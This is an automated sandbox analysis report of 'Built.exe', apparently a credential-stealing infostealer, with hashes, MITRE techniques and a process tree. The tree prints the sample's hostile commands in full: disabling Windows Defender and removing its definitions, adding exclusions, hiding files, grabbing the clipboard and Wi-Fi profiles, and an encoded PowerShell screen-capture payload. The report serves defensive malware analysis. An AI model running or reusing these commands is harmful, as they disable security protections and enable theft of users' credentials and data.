f439b492643600226a7ae3e84874c0ff987181e388588299837e152c54038870

Resubmissions

02-01-2025 17:23

250102-vyly7sslfp 10

02-01-2025 17:11

250102-vqaafasjer 10

Analysis

max time kernel
17s
max time network
16s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
02-01-2025 17:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

30.0MB
MD5

58747f90359366ffac4143bb70517aad
SHA1

2ac7aa114a2aeb477fc46faf3c7882f8c33ed8f8
SHA256

f439b492643600226a7ae3e84874c0ff987181e388588299837e152c54038870
SHA512

da30b5ac7ef422003ddc4a1e317aa724a794d7d6bbbf5c39fdb942dce6bdd0b57f6a47f2f5a6efa909b05a95073b9f12ddee1f31e6455d5b876708d12c9f833b
SSDEEP

196608:sE0cD7aLjv+bhqNVoBKUh8mz4Iv9PPv1DVWhz:Ci6L+9qz8/b4IRv3Whz

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5008	powershell.exe
2872	powershell.exe
5060	powershell.exe
1692	powershell.exe
4416	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1576	cmd.exe
3424	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1408	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3032	Built.exe
3032	Built.exe
3032	Built.exe
3032	Built.exe
3032	Built.exe
3032	Built.exe
3032	Built.exe
3032	Built.exe
3032	Built.exe
3032	Built.exe
3032	Built.exe
3032	Built.exe
3032	Built.exe
3032	Built.exe
3032	Built.exe
3032	Built.exe
3032	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
3	discord.com
5	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
1460	tasklist.exe
1804	tasklist.exe
3592	tasklist.exe
1344	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1312	cmd.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002ab07-21.dat	upx
behavioral1/memory/3032-25-0x00007FFB50800000-0x00007FFB50DE9000-memory.dmp	upx
behavioral1/files/0x001900000002aaf1-27.dat	upx
behavioral1/files/0x001900000002ab03-29.dat	upx
behavioral1/memory/3032-30-0x00007FFB550D0000-0x00007FFB550F3000-memory.dmp	upx
behavioral1/memory/3032-48-0x00007FFB564A0000-0x00007FFB564AF000-memory.dmp	upx
behavioral1/files/0x001900000002aafc-47.dat	upx
behavioral1/files/0x001c00000002aafb-46.dat	upx
behavioral1/files/0x001900000002aafa-45.dat	upx
behavioral1/files/0x001900000002aaf7-44.dat	upx
behavioral1/files/0x001900000002aaf6-43.dat	upx
behavioral1/files/0x001c00000002aaf5-42.dat	upx
behavioral1/files/0x004600000002aaf4-41.dat	upx
behavioral1/files/0x001a00000002aaf0-40.dat	upx
behavioral1/files/0x001c00000002ab0e-39.dat	upx
behavioral1/files/0x001900000002ab0d-38.dat	upx
behavioral1/files/0x001900000002ab0a-37.dat	upx
behavioral1/files/0x001900000002ab04-34.dat	upx
behavioral1/files/0x001c00000002ab02-33.dat	upx
behavioral1/memory/3032-54-0x00007FFB550A0000-0x00007FFB550CD000-memory.dmp	upx
behavioral1/memory/3032-56-0x00007FFB56350000-0x00007FFB56369000-memory.dmp	upx
behavioral1/memory/3032-58-0x00007FFB55070000-0x00007FFB55093000-memory.dmp	upx
behavioral1/memory/3032-60-0x00007FFB50680000-0x00007FFB507F7000-memory.dmp	upx
behavioral1/memory/3032-63-0x00007FFB54190000-0x00007FFB541A9000-memory.dmp	upx
behavioral1/memory/3032-64-0x00007FFB56490000-0x00007FFB5649D000-memory.dmp	upx
behavioral1/memory/3032-66-0x00007FFB54150000-0x00007FFB54183000-memory.dmp	upx
behavioral1/memory/3032-74-0x00007FFB550D0000-0x00007FFB550F3000-memory.dmp	upx
behavioral1/memory/3032-73-0x00007FFB3F5D0000-0x00007FFB3FAF2000-memory.dmp	upx
behavioral1/memory/3032-76-0x00007FFB54130000-0x00007FFB54144000-memory.dmp	upx
behavioral1/memory/3032-79-0x00007FFB54D90000-0x00007FFB54D9D000-memory.dmp	upx
behavioral1/memory/3032-78-0x00007FFB550A0000-0x00007FFB550CD000-memory.dmp	upx
behavioral1/memory/3032-71-0x00007FFB50EE0000-0x00007FFB50FAD000-memory.dmp	upx
behavioral1/memory/3032-70-0x00007FFB50800000-0x00007FFB50DE9000-memory.dmp	upx
behavioral1/memory/3032-84-0x00007FFB504A0000-0x00007FFB505BC000-memory.dmp	upx
behavioral1/memory/3032-83-0x00007FFB56350000-0x00007FFB56369000-memory.dmp	upx
behavioral1/memory/3032-111-0x00007FFB55070000-0x00007FFB55093000-memory.dmp	upx
behavioral1/memory/3032-182-0x00007FFB50680000-0x00007FFB507F7000-memory.dmp	upx
behavioral1/memory/3032-253-0x00007FFB54190000-0x00007FFB541A9000-memory.dmp	upx
behavioral1/memory/3032-278-0x00007FFB54150000-0x00007FFB54183000-memory.dmp	upx
behavioral1/memory/3032-283-0x00007FFB50EE0000-0x00007FFB50FAD000-memory.dmp	upx
behavioral1/memory/3032-294-0x00007FFB3F5D0000-0x00007FFB3FAF2000-memory.dmp	upx
behavioral1/memory/3032-305-0x00007FFB550D0000-0x00007FFB550F3000-memory.dmp	upx
behavioral1/memory/3032-318-0x00007FFB504A0000-0x00007FFB505BC000-memory.dmp	upx
behavioral1/memory/3032-304-0x00007FFB50800000-0x00007FFB50DE9000-memory.dmp	upx
behavioral1/memory/3032-310-0x00007FFB50680000-0x00007FFB507F7000-memory.dmp	upx
behavioral1/memory/3032-327-0x00007FFB56490000-0x00007FFB5649D000-memory.dmp	upx
behavioral1/memory/3032-335-0x00007FFB54150000-0x00007FFB54183000-memory.dmp	upx
behavioral1/memory/3032-336-0x00007FFB50EE0000-0x00007FFB50FAD000-memory.dmp	upx
behavioral1/memory/3032-334-0x00007FFB3F5D0000-0x00007FFB3FAF2000-memory.dmp	upx
behavioral1/memory/3032-333-0x00007FFB504A0000-0x00007FFB505BC000-memory.dmp	upx
behavioral1/memory/3032-332-0x00007FFB54D90000-0x00007FFB54D9D000-memory.dmp	upx
behavioral1/memory/3032-331-0x00007FFB54130000-0x00007FFB54144000-memory.dmp	upx
behavioral1/memory/3032-326-0x00007FFB54190000-0x00007FFB541A9000-memory.dmp	upx
behavioral1/memory/3032-325-0x00007FFB50680000-0x00007FFB507F7000-memory.dmp	upx
behavioral1/memory/3032-324-0x00007FFB55070000-0x00007FFB55093000-memory.dmp	upx
behavioral1/memory/3032-323-0x00007FFB56350000-0x00007FFB56369000-memory.dmp	upx
behavioral1/memory/3032-322-0x00007FFB550A0000-0x00007FFB550CD000-memory.dmp	upx
behavioral1/memory/3032-321-0x00007FFB564A0000-0x00007FFB564AF000-memory.dmp	upx
behavioral1/memory/3032-320-0x00007FFB550D0000-0x00007FFB550F3000-memory.dmp	upx
behavioral1/memory/3032-319-0x00007FFB50800000-0x00007FFB50DE9000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1080	cmd.exe
3544	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4436	cmd.exe
2572	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2744	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
240	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3544	PING.EXE

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
5008	powershell.exe
5060	powershell.exe
5008	powershell.exe
2872	powershell.exe
5060	powershell.exe
2872	powershell.exe
2872	powershell.exe
3424	powershell.exe
3424	powershell.exe
3424	powershell.exe
3036	powershell.exe
3036	powershell.exe
3036	powershell.exe
1692	powershell.exe
1692	powershell.exe
1216	powershell.exe
1216	powershell.exe
4416	powershell.exe
4416	powershell.exe
2172	powershell.exe
2172	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeDebugPrivilege	2872	powershell.exe
Token: SeDebugPrivilege	1804	tasklist.exe
Token: SeDebugPrivilege	1460	tasklist.exe
Token: SeDebugPrivilege	3592	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3216	WMIC.exe
Token: SeSecurityPrivilege	3216	WMIC.exe
Token: SeTakeOwnershipPrivilege	3216	WMIC.exe
Token: SeLoadDriverPrivilege	3216	WMIC.exe
Token: SeSystemProfilePrivilege	3216	WMIC.exe
Token: SeSystemtimePrivilege	3216	WMIC.exe
Token: SeProfSingleProcessPrivilege	3216	WMIC.exe
Token: SeIncBasePriorityPrivilege	3216	WMIC.exe
Token: SeCreatePagefilePrivilege	3216	WMIC.exe
Token: SeBackupPrivilege	3216	WMIC.exe
Token: SeRestorePrivilege	3216	WMIC.exe
Token: SeShutdownPrivilege	3216	WMIC.exe
Token: SeDebugPrivilege	3216	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3216	WMIC.exe
Token: SeRemoteShutdownPrivilege	3216	WMIC.exe
Token: SeUndockPrivilege	3216	WMIC.exe
Token: SeManageVolumePrivilege	3216	WMIC.exe
Token: 33	3216	WMIC.exe
Token: 34	3216	WMIC.exe
Token: 35	3216	WMIC.exe
Token: 36	3216	WMIC.exe
Token: SeDebugPrivilege	3424	powershell.exe
Token: SeIncreaseQuotaPrivilege	3216	WMIC.exe
Token: SeSecurityPrivilege	3216	WMIC.exe
Token: SeTakeOwnershipPrivilege	3216	WMIC.exe
Token: SeLoadDriverPrivilege	3216	WMIC.exe
Token: SeSystemProfilePrivilege	3216	WMIC.exe
Token: SeSystemtimePrivilege	3216	WMIC.exe
Token: SeProfSingleProcessPrivilege	3216	WMIC.exe
Token: SeIncBasePriorityPrivilege	3216	WMIC.exe
Token: SeCreatePagefilePrivilege	3216	WMIC.exe
Token: SeBackupPrivilege	3216	WMIC.exe
Token: SeRestorePrivilege	3216	WMIC.exe
Token: SeShutdownPrivilege	3216	WMIC.exe
Token: SeDebugPrivilege	3216	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3216	WMIC.exe
Token: SeRemoteShutdownPrivilege	3216	WMIC.exe
Token: SeUndockPrivilege	3216	WMIC.exe
Token: SeManageVolumePrivilege	3216	WMIC.exe
Token: 33	3216	WMIC.exe
Token: 34	3216	WMIC.exe
Token: 35	3216	WMIC.exe
Token: 36	3216	WMIC.exe
Token: SeDebugPrivilege	3036	powershell.exe
Token: SeDebugPrivilege	1344	tasklist.exe
Token: SeDebugPrivilege	1692	powershell.exe
Token: SeDebugPrivilege	1216	powershell.exe
Token: SeIncreaseQuotaPrivilege	4700	WMIC.exe
Token: SeSecurityPrivilege	4700	WMIC.exe
Token: SeTakeOwnershipPrivilege	4700	WMIC.exe
Token: SeLoadDriverPrivilege	4700	WMIC.exe
Token: SeSystemProfilePrivilege	4700	WMIC.exe
Token: SeSystemtimePrivilege	4700	WMIC.exe
Token: SeProfSingleProcessPrivilege	4700	WMIC.exe
Token: SeIncBasePriorityPrivilege	4700	WMIC.exe
Token: SeCreatePagefilePrivilege	4700	WMIC.exe
Token: SeBackupPrivilege	4700	WMIC.exe
Token: SeRestorePrivilege	4700	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5048 wrote to memory of 3032	5048	Built.exe	78
PID 5048 wrote to memory of 3032	5048	Built.exe	78
PID 3032 wrote to memory of 3348	3032	Built.exe	79
PID 3032 wrote to memory of 3348	3032	Built.exe	79
PID 3032 wrote to memory of 2344	3032	Built.exe	80
PID 3032 wrote to memory of 2344	3032	Built.exe	80
PID 3032 wrote to memory of 2420	3032	Built.exe	81
PID 3032 wrote to memory of 2420	3032	Built.exe	81
PID 3032 wrote to memory of 1312	3032	Built.exe	82
PID 3032 wrote to memory of 1312	3032	Built.exe	82
PID 2420 wrote to memory of 132	2420	cmd.exe	87
PID 2420 wrote to memory of 132	2420	cmd.exe	87
PID 1312 wrote to memory of 240	1312	cmd.exe	88
PID 1312 wrote to memory of 240	1312	cmd.exe	88
PID 3348 wrote to memory of 5008	3348	cmd.exe	89
PID 3348 wrote to memory of 5008	3348	cmd.exe	89
PID 2344 wrote to memory of 5060	2344	cmd.exe	90
PID 2344 wrote to memory of 5060	2344	cmd.exe	90
PID 3032 wrote to memory of 5056	3032	Built.exe	91
PID 3032 wrote to memory of 5056	3032	Built.exe	91
PID 5056 wrote to memory of 2872	5056	cmd.exe	93
PID 5056 wrote to memory of 2872	5056	cmd.exe	93
PID 3032 wrote to memory of 2860	3032	Built.exe	94
PID 3032 wrote to memory of 2860	3032	Built.exe	94
PID 3032 wrote to memory of 1540	3032	Built.exe	95
PID 3032 wrote to memory of 1540	3032	Built.exe	95
PID 1540 wrote to memory of 1804	1540	cmd.exe	98
PID 1540 wrote to memory of 1804	1540	cmd.exe	98
PID 2860 wrote to memory of 1460	2860	cmd.exe	99
PID 2860 wrote to memory of 1460	2860	cmd.exe	99
PID 3032 wrote to memory of 1576	3032	Built.exe	100
PID 3032 wrote to memory of 1576	3032	Built.exe	100
PID 3032 wrote to memory of 1304	3032	Built.exe	101
PID 3032 wrote to memory of 1304	3032	Built.exe	101
PID 3032 wrote to memory of 788	3032	Built.exe	104
PID 3032 wrote to memory of 788	3032	Built.exe	104
PID 3032 wrote to memory of 3440	3032	Built.exe	107
PID 3032 wrote to memory of 3440	3032	Built.exe	107
PID 3032 wrote to memory of 4436	3032	Built.exe	108
PID 3032 wrote to memory of 4436	3032	Built.exe	108
PID 3032 wrote to memory of 4924	3032	Built.exe	110
PID 3032 wrote to memory of 4924	3032	Built.exe	110
PID 3032 wrote to memory of 4060	3032	Built.exe	112
PID 3032 wrote to memory of 4060	3032	Built.exe	112
PID 1304 wrote to memory of 3216	1304	cmd.exe	113
PID 1304 wrote to memory of 3216	1304	cmd.exe	113
PID 788 wrote to memory of 3592	788	cmd.exe	114
PID 788 wrote to memory of 3592	788	cmd.exe	114
PID 1576 wrote to memory of 3424	1576	cmd.exe	115
PID 1576 wrote to memory of 3424	1576	cmd.exe	115
PID 3032 wrote to memory of 4884	3032	Built.exe	116
PID 3032 wrote to memory of 4884	3032	Built.exe	116
PID 3440 wrote to memory of 2908	3440	cmd.exe	120
PID 3440 wrote to memory of 2908	3440	cmd.exe	120
PID 4884 wrote to memory of 3036	4884	cmd.exe	121
PID 4884 wrote to memory of 3036	4884	cmd.exe	121
PID 4060 wrote to memory of 1908	4060	cmd.exe	122
PID 4060 wrote to memory of 1908	4060	cmd.exe	122
PID 4924 wrote to memory of 240	4924	cmd.exe	123
PID 4924 wrote to memory of 240	4924	cmd.exe	123
PID 4436 wrote to memory of 2572	4436	cmd.exe	124
PID 4436 wrote to memory of 2572	4436	cmd.exe	124
PID 3032 wrote to memory of 564	3032	Built.exe	147
PID 3032 wrote to memory of 564	3032	Built.exe	147

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
240	attrib.exe
3672	attrib.exe
2708	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5048
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2344
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Were restarting Discord for you', 0, 'Restart Discord', 32+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2420
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Were restarting Discord for you', 0, 'Restart Discord', 32+16);close()"
      4⤵
      PID:132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1312
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      4⤵
      Views/modifies file attributes
      PID:240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎‍.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5056
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎‍.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2860
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1540
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:1576
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1304
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:788
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3440
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4436
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4924
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4060
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAG